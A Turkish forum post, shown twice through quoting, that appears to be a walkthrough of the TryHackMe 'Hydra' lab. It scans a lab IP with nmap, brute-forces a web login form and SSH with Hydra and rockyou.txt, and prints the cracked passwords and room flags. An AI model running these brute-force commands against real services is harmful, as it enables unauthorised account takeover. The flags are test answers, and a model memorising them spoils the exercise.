THM | HYDRA CTF

CrOx1n' Alıntı:

MERHABA ARKADAŞLAR BEN ANKA RED TEAMDAN CROX BU KONUMDA SİZLERE HYDRA ADLI ZAAFİYETLİ MAKİNENİN ÇÖZÜMÜNÜ GÖSTERECEĞİM.

Komutlar

Hydra'ya aktardığımız seçenekler, hangi hizmete (protokol) saldırdığımıza bağlıdır. Örneğin, kullanıcı adı kullanıcı ve parola listesi passlist.txt olacak şekilde FTP'ye brute force uygulamak isteseydik, aşağıdaki komutu kullanırdık.

Kod:

hydra -l user -P wordlistiniz.txt ftp://IP Adresi

Bu Yaptığımız İşlemin Amacı dağıtılan makinenin hydrayı ssh ve bir formunda post yöntemi kullanma komutu aşağıda verilmiştir.

Aşağıda, bir POST oturum açma formunu brute force ile zorlamak için örnek bir Hydra komutu verilmiştir:

Kod:

hydra -l -P IP Adresi http-post-form “/:username=^USER^&password=^PASS^:F=yanlış” -V

EVET ARTIK MAKİNEMİZİ ÇÖZMEYE BAŞLAYALIM



Use Hydra to bruteforce molly's web password. What is flag 1?



İLK OLARAK PORT TARAMASI YAPARAK BAŞLAYALIM

Kod:

nmap -Pn -p- 10.10.27.85

TARAMA SONUCUNDA 22 VE 80 inci portun açık olduğunu görebiliyorum.

ARDINDAN İP İLE SİTEYE GİDİYORUM

SİTEYE BURP SUİTE VE SQL LOGİN BYPASS DENİYORUM FAKAT HER İKİSİDE ÇALIŞMADI

BU YÜZDEN HYDRA ŞİFRE KIRMAYI DENEYELİM BUNUN İÇİN AŞAĞIDAKİ

Kod:

hydra -l molly -P rockyou.txt http-post-form “/loginusername=^USER^&password=^PASS^:F=Your username or password is incorrect.” -V

EVET TARAMA SONUCUNDA
login:molly
şifreyi:camilo olarak buluyorum

SİTEYE GİRDİĞİMİZDE İSE BİZE İLK SORUNUN CEVABINI BULUYORUZ: THM{2673a7dd116de68e85c48ec0b1f2612e}

İKİNCİ SORUNUN CEVABINI BULMAK İÇİN AŞAĞIDAKİ İŞLEMLERİ YAPIYORUM.

Kod:

hydra -l molly -P rockyou.txt IP Address ssh -t 4

EVET ŞİMDİ İSE SSH BAĞLANTISI YAPALIM
VE BUNUN İÇİN AŞAĞIDAKİ KODLARI YAZIP 2.Cİ SORUNUN CEVABINI BULUYORUM.

Kod:

$ssh molly@IP Address
molly@IP Address's password: butterfly
molly@ip-10-10-66-163:~$ ls
flag2.txt
molly@ip-IP Address:~$ cat flag2.txt
THM{c8eebxxxxxxxxxxxxxxb33b2541b}

BİR SONRAKİ KONUDA GÖRÜŞMEK ÜZERE HOŞÇAKALIN.

Genişletmek için tıkla ...

CrOx1n' Alıntı:

MERHABA ARKADAŞLAR BEN ANKA RED TEAMDAN CROX BU KONUMDA SİZLERE HYDRA ADLI ZAAFİYETLİ MAKİNENİN ÇÖZÜMÜNÜ GÖSTERECEĞİM.

Komutlar

Hydra'ya aktardığımız seçenekler, hangi hizmete (protokol) saldırdığımıza bağlıdır. Örneğin, kullanıcı adı kullanıcı ve parola listesi passlist.txt olacak şekilde FTP'ye brute force uygulamak isteseydik, aşağıdaki komutu kullanırdık.

Kod:

hydra -l user -P wordlistiniz.txt ftp://IP Adresi

Bu Yaptığımız İşlemin Amacı dağıtılan makinenin hydrayı ssh ve bir formunda post yöntemi kullanma komutu aşağıda verilmiştir.

Aşağıda, bir POST oturum açma formunu brute force ile zorlamak için örnek bir Hydra komutu verilmiştir:

Kod:

hydra -l -P IP Adresi http-post-form “/:username=^USER^&password=^PASS^:F=yanlış” -V

EVET ARTIK MAKİNEMİZİ ÇÖZMEYE BAŞLAYALIM



Use Hydra to bruteforce molly's web password. What is flag 1?



İLK OLARAK PORT TARAMASI YAPARAK BAŞLAYALIM

Kod:

nmap -Pn -p- 10.10.27.85

TARAMA SONUCUNDA 22 VE 80 inci portun açık olduğunu görebiliyorum.

ARDINDAN İP İLE SİTEYE GİDİYORUM

SİTEYE BURP SUİTE VE SQL LOGİN BYPASS DENİYORUM FAKAT HER İKİSİDE ÇALIŞMADI

BU YÜZDEN HYDRA ŞİFRE KIRMAYI DENEYELİM BUNUN İÇİN AŞAĞIDAKİ

Kod:

hydra -l molly -P rockyou.txt http-post-form “/loginusername=^USER^&password=^PASS^:F=Your username or password is incorrect.” -V

EVET TARAMA SONUCUNDA
login:molly
şifreyi:camilo olarak buluyorum

SİTEYE GİRDİĞİMİZDE İSE BİZE İLK SORUNUN CEVABINI BULUYORUZ: THM{2673a7dd116de68e85c48ec0b1f2612e}

İKİNCİ SORUNUN CEVABINI BULMAK İÇİN AŞAĞIDAKİ İŞLEMLERİ YAPIYORUM.

Kod:

hydra -l molly -P rockyou.txt IP Address ssh -t 4

EVET ŞİMDİ İSE SSH BAĞLANTISI YAPALIM
VE BUNUN İÇİN AŞAĞIDAKİ KODLARI YAZIP 2.Cİ SORUNUN CEVABINI BULUYORUM.

Kod:

$ssh molly@IP Address
molly@IP Address's password: butterfly
molly@ip-10-10-66-163:~$ ls
flag2.txt
molly@ip-IP Address:~$ cat flag2.txt
THM{c8eebxxxxxxxxxxxxxxb33b2541b}

BİR SONRAKİ KONUDA GÖRÜŞMEK ÜZERE HOŞÇAKALIN.

Genişletmek için tıkla ...